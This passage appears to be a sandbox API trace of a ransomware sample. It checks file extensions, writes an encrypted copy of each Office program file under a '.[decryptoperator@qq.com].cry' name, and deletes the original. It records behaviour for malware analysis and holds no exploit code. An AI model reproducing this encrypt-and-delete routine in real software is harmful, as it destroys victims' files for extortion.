returned 66 [0054.646] lstrlenW (lpString=".doc") returned 4 [0054.646] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.646] lstrlenW (lpString=".docx") returned 5 [0054.646] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0054.646] lstrlenW (lpString=".pdf") returned 4 [0054.646] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.646] lstrlenW (lpString=".xls") returned 4 [0054.646] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.646] lstrlenW (lpString=".xlsx") returned 5 [0054.646] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0054.646] lstrlenW (lpString=".ppt") returned 4 [0054.646] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.646] lstrlenW (lpString=".zip") returned 4 [0054.646] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.646] lstrlenW (lpString=".rar") returned 4 [0054.646] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.646] lstrlenW (lpString=".bz2") returned 4 [0054.646] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.646] lstrlenW (lpString=".7z") returned 3 [0054.646] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.646] lstrlenW (lpString=".dbf") returned 4 [0054.646] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.646] lstrlenW (lpString=".1cd") returned 4 [0054.646] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.646] lstrlenW (lpString=".jpg") returned 4 [0054.646] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.647] lstrlenW (lpString=".doc") returned 4 [0054.647] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.647] lstrlenW (lpString=".docx") returned 5 [0054.647] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0054.647] lstrlenW (lpString=".pdf") returned 4 [0054.647] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.647] lstrlenW (lpString=".xls") returned 4 [0054.647] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.647] lstrlenW (lpString=".xlsx") returned 5 [0054.647] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0054.647] lstrlenW (lpString=".ppt") returned 4 [0054.647] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.647] lstrlenW (lpString=".zip") returned 4 [0054.647] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.647] lstrlenW (lpString=".rar") returned 4 [0054.647] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.647] lstrlenW (lpString=".bz2") returned 4 [0054.647] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.647] lstrlenW (lpString=".7z") returned 3 [0054.647] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.647] lstrlenW (lpString=".dbf") returned 4 [0054.647] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.647] lstrlenW (lpString=".1cd") returned 4 [0054.647] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0054.647] lstrlenW (lpString=".jpg") returned 4 [0054.647] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.648] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.648] lstrlenW (lpString="EXP_PDF.DLL") returned 11 [0054.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0054.679] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=138616) returned 1 [0054.679] CloseHandle (hObject=0x190) returned 1 [0054.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll")) returned 0x20 [0054.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.679] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0054.679] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.679] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.679] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.679] GetLastError () returned 0x0 [0054.679] ReadFile (in: hFile=0x190, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x21d78, lpOverlapped=0x0) returned 1 [0054.719] WriteFile (in: hFile=0x224, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x21d80, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x21d80, lpOverlapped=0x0) returned 1 [0054.722] ReadFile (in: hFile=0x190, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.722] WriteFile (in: hFile=0x224, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.722] SetEndOfFile (hFile=0x224) returned 1 [0054.722] CloseHandle (hObject=0x224) returned 1 [0054.722] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.722] SetEndOfFile (hFile=0x190) returned 1 [0054.723] CloseHandle (hObject=0x190) returned 1 [0054.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.724] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll")) returned 1 [0055.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.130] lstrlenW (lpString=".doc") returned 4 [0055.130] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.130] lstrlenW (lpString=".docx") returned 5 [0055.130] lstrcmpiW (lpString1=".docx", lpString2="F.DLL") returned -1 [0055.130] lstrlenW (lpString=".pdf") returned 4 [0055.130] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.130] lstrlenW (lpString=".xls") returned 4 [0055.130] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.130] lstrlenW (lpString=".xlsx") returned 5 [0055.130] lstrcmpiW (lpString1=".xlsx", lpString2="F.DLL") returned -1 [0055.130] lstrlenW (lpString=".ppt") returned 4 [0055.130] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.130] lstrlenW (lpString=".zip") returned 4 [0055.130] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.130] lstrlenW (lpString=".rar") returned 4 [0055.130] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.130] lstrlenW (lpString=".bz2") returned 4 [0055.130] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.130] lstrlenW (lpString=".7z") returned 3 [0055.131] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.131] lstrlenW (lpString=".dbf") returned 4 [0055.131] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.131] lstrlenW (lpString=".1cd") returned 4 [0055.131] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.131] lstrlenW (lpString=".jpg") returned 4 [0055.131] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.131] lstrlenW (lpString=".doc") returned 4 [0055.131] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.131] lstrlenW (lpString=".docx") returned 5 [0055.131] lstrcmpiW (lpString1=".docx", lpString2="F.DLL") returned -1 [0055.131] lstrlenW (lpString=".pdf") returned 4 [0055.131] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.131] lstrlenW (lpString=".xls") returned 4 [0055.131] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.131] lstrlenW (lpString=".xlsx") returned 5 [0055.131] lstrcmpiW (lpString1=".xlsx", lpString2="F.DLL") returned -1 [0055.131] lstrlenW (lpString=".ppt") returned 4 [0055.131] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.131] lstrlenW (lpString=".zip") returned 4 [0055.131] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.131] lstrlenW (lpString=".rar") returned 4 [0055.131] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.131] lstrlenW (lpString=".bz2") returned 4 [0055.131] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.131] lstrlenW (lpString=".7z") returned 3 [0055.131] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.131] lstrlenW (lpString=".dbf") returned 4 [0055.132] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.132] lstrlenW (lpString=".1cd") returned 4 [0055.132] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0055.132] lstrlenW (lpString=".jpg") returned 4 [0055.132] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.132] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0055.132] lstrlenW (lpString="FLTLDR.EXE") returned 10 [0055.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0055.165] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=157024) returned 1 [0055.165] CloseHandle (hObject=0x22c) returned 1 [0055.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe")) returned 0x20 [0055.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0055.165] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.166] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0055.166] GetLastError () returned 0x0 [0055.166] ReadFile (in: hFile=0x22c, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x26560, lpOverlapped=0x0) returned 1 [0055.219] WriteFile (in: hFile=0x194, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x26570, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x26570, lpOverlapped=0x0) returned 1 [0055.222] ReadFile (in: hFile=0x22c, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.222] WriteFile (in: hFile=0x194, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0055.222] SetEndOfFile (hFile=0x194) returned 1 [0055.254] CloseHandle (hObject=0x194) returned 1 [0055.254] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.254] SetEndOfFile (hFile=0x22c) returned 1 [0055.256] CloseHandle (hObject=0x22c) returned 1 [0055.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.256] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe")) returned 1 [0055.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.524] lstrlenW (lpString=".doc") returned 4 [0055.524] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0055.524] lstrlenW (lpString=".docx") returned 5 [0055.524] lstrcmpiW (lpString1=".docx", lpString2="R.EXE") returned -1 [0055.524] lstrlenW (lpString=".pdf") returned 4 [0055.524] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0055.524] lstrlenW (lpString=".xls") returned 4 [0055.524] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0055.524] lstrlenW (lpString=".xlsx") returned 5 [0055.524] lstrcmpiW (lpString1=".xlsx", lpString2="R.EXE") returned -1 [0055.524] lstrlenW (lpString=".ppt") returned 4 [0055.524] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0055.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.524] lstrlenW (lpString=".zip") returned 4 [0055.524] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0055.524] lstrlenW (lpString=".rar") returned 4 [0055.524] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0055.524] lstrlenW (lpString=".bz2") returned 4 [0055.524] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0055.524] lstrlenW (lpString=".7z") returned 3 [0055.524] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0055.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.524] lstrlenW (lpString=".dbf") returned 4 [0055.524] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0055.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.524] lstrlenW (lpString=".1cd") returned 4 [0055.524] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0055.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.524] lstrlenW (lpString=".jpg") returned 4 [0055.524] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0055.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.525] lstrlenW (lpString=".doc") returned 4 [0055.525] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0055.525] lstrlenW (lpString=".docx") returned 5 [0055.525] lstrcmpiW (lpString1=".docx", lpString2="R.EXE") returned -1 [0055.525] lstrlenW (lpString=".pdf") returned 4 [0055.525] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0055.525] lstrlenW (lpString=".xls") returned 4 [0055.525] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0055.525] lstrlenW (lpString=".xlsx") returned 5 [0055.525] lstrcmpiW (lpString1=".xlsx", lpString2="R.EXE") returned -1 [0055.525] lstrlenW (lpString=".ppt") returned 4 [0055.525] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0055.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.525] lstrlenW (lpString=".zip") returned 4 [0055.525] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0055.525] lstrlenW (lpString=".rar") returned 4 [0055.525] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0055.525] lstrlenW (lpString=".bz2") returned 4 [0055.525] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0055.525] lstrlenW (lpString=".7z") returned 3 [0055.525] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0055.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.525] lstrlenW (lpString=".dbf") returned 4 [0055.525] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0055.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.525] lstrlenW (lpString=".1cd") returned 4 [0055.525] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0055.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 66 [0055.525] lstrlenW (lpString=".jpg") returned 4 [0055.525] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0055.525] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0055.525] lstrlenW (lpString="MSOICONS.EXE") returned 12 [0055.525] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0055.727] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=473952) returned 1 [0055.727] CloseHandle (hObject=0x1f4) returned 1 [0055.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe")) returned 0x20 [0055.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0055.727] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.728] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0055.728] GetLastError () returned 0x0 [0055.728] ReadFile (in: hFile=0x1f4, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x73b60, lpOverlapped=0x0) returned 1 [0055.777] WriteFile (in: hFile=0x200, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x73b70, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x73b70, lpOverlapped=0x0) returned 1 [0055.787] ReadFile (in: hFile=0x1f4, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.787] WriteFile (in: hFile=0x200, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.787] SetEndOfFile (hFile=0x200) returned 1 [0055.994] CloseHandle (hObject=0x200) returned 1 [0055.995] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.995] SetEndOfFile (hFile=0x1f4) returned 1 [0056.029] CloseHandle (hObject=0x1f4) returned 1 [0056.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0056.030] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe")) returned 1 [0056.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 68 [0056.030] lstrlenW (lpString=".doc") returned 4 [0056.030] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0056.030] lstrlenW (lpString=".docx") returned 5 [0056.030] lstrcmpiW (lpString1=".docx", lpString2="S.EXE") returned -1 [0056.030] lstrlenW (lpString=".pdf") returned 4 [0056.030] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0056.030] lstrlenW (lpString=".xls") returned 4 [0056.030] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0056.030] lstrlenW (lpString=".xlsx") returned 5 [0056.030] lstrcmpiW (lpString1=".xlsx", lpString2="S.EXE") returned -1 [0056.030] lstrlenW (lpString=".ppt") returned 4 [0056.030] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0056.030] 